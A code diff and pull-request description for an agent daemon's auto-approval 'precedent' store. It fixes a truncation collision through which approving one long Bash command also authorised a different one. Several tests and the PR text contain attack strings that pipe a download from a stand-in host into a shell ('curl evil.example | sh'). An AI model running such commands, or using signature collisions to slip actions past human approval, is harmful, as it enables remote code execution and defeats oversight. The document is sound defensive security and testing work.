+            options: [{ label: 'A', description: 'first' }],
+          },
+        ],
+      }),
     );
+    expect(question.kind).toBe('multi_question');
+    expect(question.precedentSignature).toBeUndefined();
   });
 });
 
-describe('#976 truncation stays aligned across the split', () => {
-  test('a >120-char Bash command truncates identically on both sides', () => {
-    // `summarizeToolInput` is now shared, so this cannot drift -- which is
-    // exactly why it is worth pinning: the previous arrangement had the cap in
-    // a private method the consult side would have had to reimplement.
+describe('#990 fix: precedentSignature is never truncated, even past 120 characters', () => {
+  test('a >120-char Bash command: precedentSignature is the FULL command; text still truncates', () => {
     const command = `echo ${'x'.repeat(300)}`;
     const question = bridge().buildPermissionQuestion(permissionRequest('Bash', { command }));
     const derived = signatureForOperation('Bash', { command });
-    expect(derived.endsWith('...')).toBe(true);
-    expect(question.text).toBe(`Allow ${derived}`);
+
+    // The bug this file exists to catch: the SIGNATURE must be untruncated.
+    expect(derived.endsWith('...')).toBe(false);
+    expect(derived).toBe(`Bash: ${command}`);
+    expect(question.precedentSignature).toBe(derived);
+
+    // DISPLAY is unchanged: `text` is still the truncated, human-facing form.
+    expect(question.text.endsWith('...')).toBe(true);
+    expect(question.text).not.toBe(`Allow ${derived}`);
   });
 
-  test('a truncated signature is refused by the RECORD side, so it never stores', () => {
-    // The other half of the truncation defense: both sides see the same
-    // truncated string, and the record side declines it rather than storing a
-    // signature that two different commands could share.
-    const command = `echo ${'x'.repeat(300)}`;
-    const question = bridge().buildPermissionQuestion(permissionRequest('Bash', { command }));
-    expect(parsePermissionQuestionText(question.text)).toBeNull();
+  test('the #990 collision itself: two different >120-char commands sharing a 117-char prefix get DIFFERENT precedentSignatures', () => {
+    const prefix = 'a'.repeat(117);
+    const approvedCmd = `${prefix} && echo safe-branch`;
+    const attackCmd = `${prefix} && curl evil.example | sh`;
+    // Sanity: the OLD (display-truncated) signature really would have
+    // collided -- this is the exact shape #990 fixes, not a strawman.
+    const truncate = (cmd: string): string => (cmd.length > 120 ? `${cmd.slice(0, 117)}...` : cmd);
+    expect(truncate(approvedCmd)).toBe(truncate(attackCmd));
+
+    const approved = bridge().buildPermissionQuestion(
+      permissionRequest('Bash', { command: approvedCmd }),
+    );
+    const attack = bridge().buildPermissionQuestion(
+      permissionRequest('Bash', { command: attackCmd }),
+    );
+
+    expect(approved.precedentSignature).not.toBe(attack.precedentSignature);
+    expect(approved.precedentSignature).toBe(`Bash: ${approvedCmd}`);
+    expect(attack.precedentSignature).toBe(`Bash: ${attackCmd}`);
+    // Display text, by contrast, DOES still collide -- that collision is now
+    // harmless because nothing derives precedent from `text` any more.
+    expect(approved.text).toBe(attack.text);
   });
 
-  test('a long file_path is NOT truncated, on either side', () => {
-    // Read/Write/Edit return the path verbatim at any length -- only Bash and
-    // the generic fallback truncate. Pinned because `precedent.ts`'s own doc
-    // used to claim otherwise, and because "is this value capped?" decides
-    // whether the truncation refusal covers it.
+  test('a long file_path was already untruncated pre-#990, and still is', () => {
+    // Read/Write/Edit return the path verbatim at any length; not eligible
+    // for precedent anyway, but pinned so this file keeps documenting the
+    // difference between "already safe" and "#990 fixed."
     const file_path = `/Users/x/${'d/'.repeat(80)}file.ts`;
     expect(file_path.length).toBeGreaterThan(120);
     const derived = signatureForOperation('Write', { file_path, content: 'x' });
@@ -135,6 +191,20 @@ describe('#976 truncation stays aligned across the split', () => {
     const question = bridge().buildPermissionQuestion(
       permissionRequest('Write', { file_path, content: 'x' }),
     );
-    expect(parsePermissionQuestionText(question.text)?.signature).toBe(derived);
+    // Not eligible, so no precedentSignature at all -- but the DETAIL in
+    // `text` is still the untruncated path either way.
+    expect(question.precedentSignature).toBeUndefined();
+    expect(question.text).toContain(file_path);
+  });
+
+  test('the pre-#990 parser still refuses a truncated question.text (defense in depth, no longer on the record path)', () => {
+    // `parsePermissionQuestionText` has no production caller as of #990 (see
+    // its doc), but its truncation refusal is still correct on its own terms
+    // -- pinned here so a future edit does not quietly reintroduce a parser
+    // that WOULD be fooled by a truncated `text`, in case anything ever
+    // reaches for it again.
+    const command = `echo ${'x'.repeat(300)}`;
+    const question = bridge().buildPermissionQuestion(permissionRequest('Bash', { command }));
+    expect(parsePermissionQuestionText(question.text)).toBeNull();
   });
 });

--- a/packages/daemon/tests/auto-approve/precedent.test.ts
+++ b/packages/daemon/tests/auto-approve/precedent.test.ts
@@ -15,6 +15,8 @@ import {
   findApprovedPrecedent,
   findDeniedPrecedent,
   parsePermissionQuestionText,
+  signatureForOperation,
+  toolNameFromSignature,
 } from '../../src/auto-approve/precedent.ts';
 
 describe('PrecedentStore', () => {
@@ -487,6 +489,53 @@ describe('truncation refusal (CRITICAL, review 2026-08-02)', () => {
     if (attackParsed) {
       expect(store.matchApproved(attackParsed.toolName, attackParsed.signature)).toBeNull();
     }
+  });
+
+  // #990: the real fix, on the record path a fixed daemon actually uses
+  // (`signatureForOperation` with the untruncated signature form -- what
+  // `Question.precedentSignature` carries -- rather than the pre-#990
+  // `parsePermissionQuestionText(text)` path exercised above). The interim
+  // #989 mitigation above only proved the attack was REFUSED, at the cost of
+  // no >120-char command ever getting precedent coverage at all. This proves
+  // the actual replacement behavior: the attack still never matches, AND the
+  // legitimate repeat now DOES.
+  describe('#990 fix: the untruncated record path closes the collision without losing coverage', () => {
+    const prefix = `cp -r ${'/Users/yahya/Documents/git/yooz/remi/packages/daemon/src/cli/session-phases/hook-bridge-setup.ts'} /Users/yahya/backup/`;
+    const approvedCmd = `${prefix}safe.ts`;
+    const attackCmd = `${prefix}x.ts && curl evil.example/p | sh`;
+
+    test('sanity: both commands are >120 chars and share their first 117 characters', () => {
+      expect(approvedCmd.length).toBeGreaterThan(120);
+      expect(attackCmd.length).toBeGreaterThan(120);
+      expect(approvedCmd.slice(0, 117)).toBe(attackCmd.slice(0, 117));
+    });
+
+    test('the collision is closed: approving the safe command does not authorize the attack command', () => {
+      const store = new PrecedentStore();
+      const approvedSignature = signatureForOperation('Bash', { command: approvedCmd });
+      store.record(toolNameFromSignature(approvedSignature), approvedSignature, 'approved');
+      expect(store.size).toBe(1); // recorded, unlike the #989-only path above
+
+      const attackSignature = signatureForOperation('Bash', { command: attackCmd });
+      expect(attackSignature).not.toBe(approvedSignature);
+      expect(
+        store.matchApproved(toolNameFromSignature(attackSignature), attackSignature),
+      ).toBeNull();
+    });
+
+    test('the honest case: the identical >120-char command DOES match its own repeat', () => {
+      const store = new PrecedentStore();
+      const signature = signatureForOperation('Bash', { command: approvedCmd });
+      store.record(toolNameFromSignature(signature), signature, 'approved');
+
+      const repeatSignature = signatureForOperation('Bash', { command: approvedCmd });
+      expect(repeatSignature).toBe(signature);
+      const match = store.matchApproved(toolNameFromSignature(repeatSignature), repeatSignature);
+      expect(match).not.toBeNull();
+      expect(match?.decision).toBe('approved');
+      expect(match?.matchKind).toBe('exact');
+      expect(match?.matchedSignature).toBe(signature);
+    });
   });
 });
 

--- a/packages/daemon/tests/auto-approve/precedent.test.ts
+++ b/packages/daemon/tests/auto-approve/precedent.test.ts
@@ -15,6 +15,7 @@ import {
   findApprovedPrecedent,
   findDeniedPrecedent,
   parsePermissionQuestionText,
+  precedentMayAuthorize,
   signatureForOperation,
   toolNameFromSignature,
 } from '../../src/auto-approve/precedent.ts';
@@ -536,6 +537,65 @@ describe('truncation refusal (CRITICAL, review 2026-08-02)', () => {
       expect(match?.matchKind).toBe('exact');
       expect(match?.matchedSignature).toBe(signature);
     });
+  });
+});
+
+describe('toolNameFromSignature splits on the FIRST ": " (the prefix boundary)', () => {
+  // The record side (`handleAnswer`) recovers the tool name from the signature
+  // string alone -- `Question` carries no separate tool-name field. That is
+  // only correct if the split lands on the `<tool>: ` boundary
+  // `signatureForOperation` inserts, NOT on a `': '` that occurs inside the
+  // command text. `git commit -m "fix: bug"` and `echo "key: value"` are
+  // ordinary commands; a split on the LAST `': '` (or a naive parser) would
+  // key their precedent under a garbage tool name, so the recorded answer
+  // could never match the consult side (which keys under real `Bash`).
+  for (const command of [
+    'git commit -m "fix: bug"',
+    'echo "key: value"',
+    'psql -c "select 1: foo"',
+    'awk -F": " "{print}" file', // (illustrative parse case only; awk is not itself precedent-eligible)
+  ]) {
+    test(`Bash command containing ": " -> tool name is still Bash: ${command.slice(0, 30)}`, () => {
+      const signature = signatureForOperation('Bash', { command });
+      expect(signature).toBe(`Bash: ${command}`);
+      expect(toolNameFromSignature(signature)).toBe('Bash');
+    });
+  }
+
+  test('a bare signature with no ": " is returned whole (no summarizable argument)', () => {
+    expect(toolNameFromSignature('Bash')).toBe('Bash');
+  });
+
+  test('record/consult round-trip survives a colon-space command end to end', () => {
+    const command = 'git commit -m "fix: the precedent bug"';
+    const store = new PrecedentStore();
+    const signature = signatureForOperation('Bash', { command });
+    // RECORD as handleAnswer does: tool name recovered from the signature.
+    store.record(toolNameFromSignature(signature), signature, 'approved');
+    // CONSULT as the gate does: real tool name + freshly derived signature.
+    const match = store.matchApproved('Bash', signatureForOperation('Bash', { command }));
+    expect(match?.decision).toBe('approved');
+  });
+});
+
+describe('precedentMayAuthorize requires non-whitespace command content', () => {
+  // A whitespace-only command is an inert no-op whose signature trims to a
+  // bare `Bash:`; leaving it eligible lets every whitespace-only command
+  // collapse to one precedent entry and cross-match (harmless, but meaningless
+  // -- adversarial review, 2026-08-16). The gate excludes it on BOTH the
+  // record and consult sides, so they stay in agreement.
+  for (const command of ['   ', '\t\t', '\n', '']) {
+    test(`whitespace-only / empty command is NOT eligible: ${JSON.stringify(command)}`, () => {
+      expect(precedentMayAuthorize('Bash', { command })).toBe(false);
+    });
+  }
+
+  test('a command with real content IS eligible even if it has leading/trailing space', () => {
+    expect(precedentMayAuthorize('Bash', { command: '  ls -la  ' })).toBe(true);
+  });
+
+  test('cmd-only (no command field) is NOT eligible -- the risk layer reads command', () => {
+    expect(precedentMayAuthorize('Bash', { cmd: 'ls -la' })).toBe(false);
   });
 });
 

--- a/packages/daemon/tests/cli/handlers/input-events.test.ts
+++ b/packages/daemon/tests/cli/handlers/input-events.test.ts
@@ -2567,6 +2567,26 @@ describe('createInputHandlers', () => {
       ]);
     });
 
+    // #990: the recorded tool name is DERIVED from the signature
+    // (`toolNameFromSignature`), never hardcoded. Bash is the only
+    // precedent-eligible tool `buildPermissionQuestion` emits today, so every
+    // other test here would pass equally if `handleAnswer` recorded a constant
+    // 'Bash' -- a latent gap the moment the eligible set grows. This pins the
+    // derivation with a NON-Bash embedded name: a constant 'Bash' regresses it.
+    test('derives the recorded tool name from the signature, not a hardcoded Bash', async () => {
+      const { sessionId, calls, handlers } = setUp();
+      registerPermissionQuestion(sessionId, {
+        text: 'Allow Foo: bar baz',
+        precedentSignature: 'Foo: bar baz',
+      });
+
+      await handlers.onAnswer(CID, sessionId, QID, 'Yes');
+
+      expect(calls).toEqual([
+        { sessionId, toolName: 'Foo', signature: 'Foo: bar baz', decision: 'approved' },
+      ]);
+    });
+
     // #990 fail-closed: a `permission_request`-sourced question with NO
     // `precedentSignature` (a legacy `Question` predating this field, or any
     // future producer that forgets to set it) must record NOTHING -- never

--- a/packages/daemon/tests/cli/handlers/input-events.test.ts
+++ b/packages/daemon/tests/cli/handlers/input-events.test.ts
@@ -2458,6 +2458,13 @@ describe('createInputHandlers', () => {
       sessionRegistry.addQuestion(sessionId, {
         id: QID,
         text: 'Allow Bash: git status',
+        // #990: the untruncated signature `buildPermissionQuestion` would
+        // compute for this same operation -- kept identical to `text`'s
+        // embedded detail by default so the pre-#990 assertions below
+        // ("recorded signature equals X") keep meaning the same thing; a
+        // dedicated test below overrides this to differ from `text` and
+        // proves the recorder reads THIS field, not `text`.
+        precedentSignature: 'Bash: git status',
         options: [
           { value: '1', label: 'Yes', isRecommended: true, isYes: true, isNo: false },
           { value: '2', label: 'No', isRecommended: false, isYes: false, isNo: true },
@@ -2538,6 +2545,40 @@ describe('createInputHandlers', () => {
       expect(calls).toEqual([
         { sessionId, toolName: 'Bash', signature: 'Bash: git status', decision: 'approved' },
       ]);
+    });
+
+    // #990: the core fix. `active.precedentSignature` -- not `active.text` --
+    // is the recorded signature. Constructed so the two DISAGREE, so a
+    // regression that reads `text` instead (or falls back to parsing it)
+    // would record the wrong value and this test would catch it, not just
+    // silently pass for the wrong reason.
+    test('records from precedentSignature, not from the (possibly different) display text', async () => {
+      const { sessionId, calls, handlers } = setUp();
+      const longCommand = `cp ${'a'.repeat(200)} safe.ts`;
+      registerPermissionQuestion(sessionId, {
+        text: `Allow Bash: ${longCommand.slice(0, 117)}...`, // the truncated DISPLAY form
+        precedentSignature: `Bash: ${longCommand}`, // the untruncated SIGNATURE form
+      });
+
+      await handlers.onAnswer(CID, sessionId, QID, 'Yes');
+
+      expect(calls).toEqual([
+        { sessionId, toolName: 'Bash', signature: `Bash: ${longCommand}`, decision: 'approved' },
+      ]);
+    });
+
+    // #990 fail-closed: a `permission_request`-sourced question with NO
+    // `precedentSignature` (a legacy `Question` predating this field, or any
+    // future producer that forgets to set it) must record NOTHING -- never
+    // fall back to parsing `text`, which is exactly the truncated-signature
+    // collision #990 exists to close.
+    test('does NOT record when precedentSignature is absent, even for an otherwise-parseable permission_request question', async () => {
+      const { sessionId, calls, handlers } = setUp();
+      registerPermissionQuestion(sessionId, { precedentSignature: undefined });
+
+      await handlers.onAnswer(CID, sessionId, QID, 'Yes');
+
+      expect(calls).toEqual([]);
     });
 
     test('does NOT record for a non-permission_request source (source: pty), even with otherwise-parseable text', async () => {

--- a/packages/daemon/tests/hooks/hook-event-bridge.test.ts
+++ b/packages/daemon/tests/hooks/hook-event-bridge.test.ts
@@ -225,6 +225,73 @@ describe('HookEventBridge', () => {
     expect(questions[0]?.submitLabel).toBeUndefined();
   });
 
+  // #990: buildPermissionQuestion stamps the untruncated, exact-match
+  // precedent signature onto a precedent-eligible question (see
+  // `Question.precedentSignature`'s doc and `precedent.ts`'s
+  // `signatureForOperation` / `precedentMayAuthorize`).
+  describe('precedentSignature (#990)', () => {
+    it('sets precedentSignature for an eligible Bash command, distinct from the display text', () => {
+      const { bridge, questions } = createBridge();
+
+      bridge.handlePermissionRequest({
+        ...makeCommon(),
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Bash',
+        tool_input: { command: 'git push origin main' },
+      } as PermissionRequestHookInput);
+
+      expect(questions[0]?.precedentSignature).toBe('Bash: git push origin main');
+      expect(questions[0]?.text).toBe('Allow Bash: git push origin main');
+    });
+
+    it('does NOT set precedentSignature for an ineligible tool (Write)', () => {
+      const { bridge, questions } = createBridge();
+
+      bridge.handlePermissionRequest({
+        ...makeCommon(),
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Write',
+        tool_input: { file_path: '/tmp/a.txt', content: 'x' },
+      } as PermissionRequestHookInput);
+
+      expect(questions[0]?.precedentSignature).toBeUndefined();
+    });
+
+    it('does NOT set precedentSignature for a Bash call using cmd instead of command (unclassifiable band)', () => {
+      const { bridge, questions } = createBridge();
+
+      bridge.handlePermissionRequest({
+        ...makeCommon(),
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Bash',
+        tool_input: { cmd: 'ls -la' },
+      } as PermissionRequestHookInput);
+
+      // `precedentMayAuthorize` requires the `command` field specifically
+      // (see its own doc: the risk layer never reads `cmd`), even though
+      // `summarizeToolInput` would happily build a complete-looking summary
+      // from it. text still gets a summary either way.
+      expect(questions[0]?.precedentSignature).toBeUndefined();
+      expect(questions[0]?.text).toBe('Allow Bash: ls -la');
+    });
+
+    it('the SIGNATURE is untruncated past 120 characters; the DISPLAY text still truncates', () => {
+      const { bridge, questions } = createBridge();
+      const command = `echo ${'x'.repeat(300)}`;
+
+      bridge.handlePermissionRequest({
+        ...makeCommon(),
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Bash',
+        tool_input: { command },
+      } as PermissionRequestHookInput);
+
+      expect(questions[0]?.precedentSignature).toBe(`Bash: ${command}`);
+      expect(questions[0]?.text?.endsWith('...')).toBe(true);
+      expect(questions[0]?.text).not.toContain(command);
+    });
+  });
+
   // #628: the gate passes the LLM's lock-screen summary; the bridge must set it on
   // the emitted Question (the push prefers it over the raw "Allow Bash: …").
   it('sets Question.summary from the summary argument', () => {

--- a/packages/daemon/tests/hooks/tool-summary.test.ts
+++ b/packages/daemon/tests/hooks/tool-summary.test.ts
@@ -1,0 +1,109 @@
+/**
+ * #990: `summarizeToolInput`'s two forms -- DISPLAY (default, truncates a
+ * long Bash command to 120 chars) and SIGNATURE (`forSignature: true`,
+ * never truncates). Precedent's exact-match authorization depends on the
+ * signature form being genuinely untruncated at any length; this file pins
+ * that property directly at the source, independent of `precedent.ts` or
+ * `HookEventBridge` (both are covered separately -- this is the one place
+ * the two forms can diverge, so it gets its own focused coverage).
+ */
+
+import { describe, expect, it } from 'bun:test';
+import { summarizeToolInput } from '../../src/hooks/tool-summary.ts';
+
+describe('summarizeToolInput — display form (default)', () => {
+  it('returns a Bash command verbatim under the 120-char cap', () => {
+    expect(summarizeToolInput('Bash', { command: 'git push origin main' })).toBe(
+      'git push origin main',
+    );
+  });
+
+  it('truncates a Bash command over 120 chars to 117 chars + "..."', () => {
+    const command = `echo ${'x'.repeat(300)}`;
+    const summary = summarizeToolInput('Bash', { command });
+    expect(summary).not.toBeNull();
+    expect(summary?.length).toBe(120);
+    expect(summary?.endsWith('...')).toBe(true);
+    expect(summary).toBe(`${command.slice(0, 117)}...`);
+  });
+
+  it('does not truncate a long file_path (Read/Write/Edit)', () => {
+    const file_path = `/Users/x/${'d/'.repeat(80)}file.ts`;
+    expect(file_path.length).toBeGreaterThan(120);
+    expect(summarizeToolInput('Write', { file_path, content: 'x' })).toBe(file_path);
+  });
+
+  it('does not truncate a long Glob/Grep pattern', () => {
+    const pattern = `**/${'x'.repeat(150)}/*.ts`;
+    expect(summarizeToolInput('Glob', { pattern })).toBe(pattern);
+  });
+
+  it('does not truncate a long WebFetch url', () => {
+    const url = `https://example.com/${'x'.repeat(150)}`;
+    expect(summarizeToolInput('WebFetch', { url })).toBe(url);
+  });
+
+  it('explicit forSignature: false behaves exactly like the default', () => {
+    const command = `echo ${'x'.repeat(300)}`;
+    expect(summarizeToolInput('Bash', { command }, { forSignature: false })).toBe(
+      summarizeToolInput('Bash', { command }),
+    );
+  });
+});
+
+describe('summarizeToolInput — signature form (forSignature: true, #990)', () => {
+  it('returns the FULL Bash command past 120 chars, never truncated', () => {
+    const command = `echo ${'x'.repeat(300)}`;
+    const summary = summarizeToolInput('Bash', { command }, { forSignature: true });
+    expect(summary).toBe(command);
+    expect(summary?.endsWith('...')).toBe(false);
+  });
+
+  it('two commands that DISPLAY-truncate to the identical summary remain distinct as signatures', () => {
+    const prefix = 'a'.repeat(117);
+    const cmdA = `${prefix} && echo one`;
+    const cmdB = `${prefix} && echo two-but-different`;
+    // Sanity: the display forms really do collide (the #990 bug shape).
+    expect(summarizeToolInput('Bash', { command: cmdA })).toBe(
+      summarizeToolInput('Bash', { command: cmdB }),
+    );
+    // The signature forms must not.
+    const sigA = summarizeToolInput('Bash', { command: cmdA }, { forSignature: true });
+    const sigB = summarizeToolInput('Bash', { command: cmdB }, { forSignature: true });
+    expect(sigA).not.toBe(sigB);
+    expect(sigA).toBe(cmdA);
+    expect(sigB).toBe(cmdB);
+  });
+
+  it('a short Bash command is identical in both forms', () => {
+    expect(summarizeToolInput('Bash', { command: 'git status' }, { forSignature: true })).toBe(
+      summarizeToolInput('Bash', { command: 'git status' }),
+    );
+  });
+
+  it('Read/Write/Edit/Glob/Grep/WebFetch are unaffected by forSignature (already untruncated)', () => {
+    const cases: Array<[string, Record<string, unknown>]> = [
+      ['Write', { file_path: '/tmp/a.txt', content: 'x' }],
+      ['Read', { file_path: '/tmp/a.txt' }],
+      ['Edit', { path: '/tmp/a.txt', old_string: 'a', new_string: 'b' }],
+      ['Glob', { pattern: '**/*.ts' }],
+      ['Grep', { pattern: 'TODO' }],
+      ['WebFetch', { url: 'https://example.com' }],
+    ];
+    for (const [toolName, toolInput] of cases) {
+      expect(summarizeToolInput(toolName, toolInput, { forSignature: true })).toBe(
+        summarizeToolInput(toolName, toolInput),
+      );
+    }
+  });
+
+  it('the Bash `cmd` fallback field is also untruncated under forSignature', () => {
+    const cmd = `ls ${'x'.repeat(300)}`;
+    expect(summarizeToolInput('Bash', { cmd }, { forSignature: true })).toBe(cmd);
+  });
+
+  it('returns null for a tool with no summarizable argument, in either form', () => {
+    expect(summarizeToolInput('SomeTool', { unrelated: 1 })).toBeNull();
+    expect(summarizeToolInput('SomeTool', { unrelated: 1 }, { forSignature: true })).toBeNull();
+  });
+});

--- a/packages/shared/src/types.ts
+++ b/packages/shared/src/types.ts
@@ -260,6 +260,33 @@ export interface Question {
    * carry it.
    */
   readonly held?: boolean | undefined;
+
+  /**
+   * The exact-match precedent signature for this operation (#990), UNTRUNCATED
+   * — distinct from `text`, which is the human-facing DISPLAY string and may
+   * be truncated to a bounded length for a lock-screen card or terminal
+   * prompt. NOT for display: this field exists solely so `handleAnswer`
+   * (`daemon/cli/handlers/input-events.ts`) can record a provenance-safe
+   * human answer into session precedent (`daemon/auto-approve/precedent.ts`,
+   * ADR 0015) without reconstructing it by parsing the (possibly truncated)
+   * `text` — the previous approach, and the source of the #990 collision: two
+   * different >120-character Bash commands sharing their first 117 characters
+   * truncated to the identical `text`, so approving one silently authorized
+   * the other.
+   *
+   * Built by `HookEventBridge.buildPermissionQuestion` from
+   * `signatureForOperation(toolName, tool_input)` — the SAME function the
+   * consult side calls at decision time — so the recorded and consulted
+   * signatures are byte-identical by construction, not by care.
+   *
+   * Present only for a precedent-eligible operation (today: `Bash` with a
+   * `command` field — see `precedentMayAuthorize`); `undefined` for every
+   * other question, including a question-bearing-tool prompt (AskUserQuestion
+   * / ExitPlanMode) and any question predating this field. `handleAnswer`
+   * treats an absent value as FAIL CLOSED: it records nothing rather than
+   * falling back to parsing `text`.
+   */
+  readonly precedentSignature?: string | undefined;
 }
 
 /**


### PR DESCRIPTION
## Summary

Closes the #990 truncation-collision in session precedent. Precedent is the one non-text channel that can grant `explicit` authorization (ADR 0015), so a signature collision is privilege escalation: the old signature bottomed out in the 120-char display summary, so two different >120-char commands sharing their first 117 chars collapsed to one signature — approve a benign `cp <long-path> safe.ts` and `<same-prefix>x.ts && curl evil | sh` inherited that approval. This repo's paths routinely exceed 120 chars, so it was reachable in ordinary use, not just adversarially.

The fix threads an **untruncated** signature (`Question.precedentSignature`) as a separate field; `Question.text` keeps truncating for the lock-screen card. Record and consult sides both derive from the single `signatureForOperation` function, so they are byte-identical by construction, not by care. `#989`'s interim mitigation (refuse any truncated signature) left every >120-char command uncovered by precedent; this restores that coverage while closing the collision.

## What changed

- `summarizeToolInput(toolName, toolInput, { forSignature })` — `forSignature: true` skips the display truncation, verbatim at any length. Only `signatureForOperation` passes it.
- `signatureForOperation` is now the ONE canonical derivation, used by both the consult side (the gate) and the record side (`buildPermissionQuestion` stamps `Question.precedentSignature`). `toolNameFromSignature` is its structural inverse for the record path.
- `handleAnswer` records from `precedentSignature` (untruncated), never by parsing the truncated `text`; fails closed (records nothing) when it is absent.
- Review follow-ups (final commit): pinned `toolNameFromSignature` splits on the first `": "` (colon-space commands like `git commit -m "fix: ..."` stay covered); pinned the recorded tool name is signature-derived, not a hardcoded `Bash`; `precedentMayAuthorize` now requires `command.trim().length > 0` (whitespace-only no-ops were cross-matching); documented that the truncation refusal weakens the deny stop rule (not uniformly "safe"), behavioral fix tracked as #1067.

## Review

- **Adversarial review: SHIP** — could not construct a two-different-operations-same-signature false approve against the real code; the eligible set is Bash-only and `signatureForOperation` is injective on the command, record/consult cannot drift.
- **Mutation review: ADEQUATE** — every collision- or privesc-reopening mutation is caught; the surviving mutants were all safe-direction gaps, now closed by the follow-up tests (proven: 4c and #8 mutations fail a test).

## Test plan

- `precedent.test.ts`, `precedent-signature-roundtrip.test.ts`, `tool-summary.test.ts`, `hook-event-bridge.test.ts`, `input-events.test.ts` — 271 targeted pass. The collision test constructs the real >120-char shared-117-prefix `cp`, proves the OLD truncation WOULD have collided (sanity), then proves the new signatures differ, `store.size == 1` (recorded, unlike the #989 dark path), and the honest repeat still matches.
- Full suite: 6467 pass / 71 skip / 0 fail. Typecheck, biome, typos clean.

Closes #990
Part of epic #1057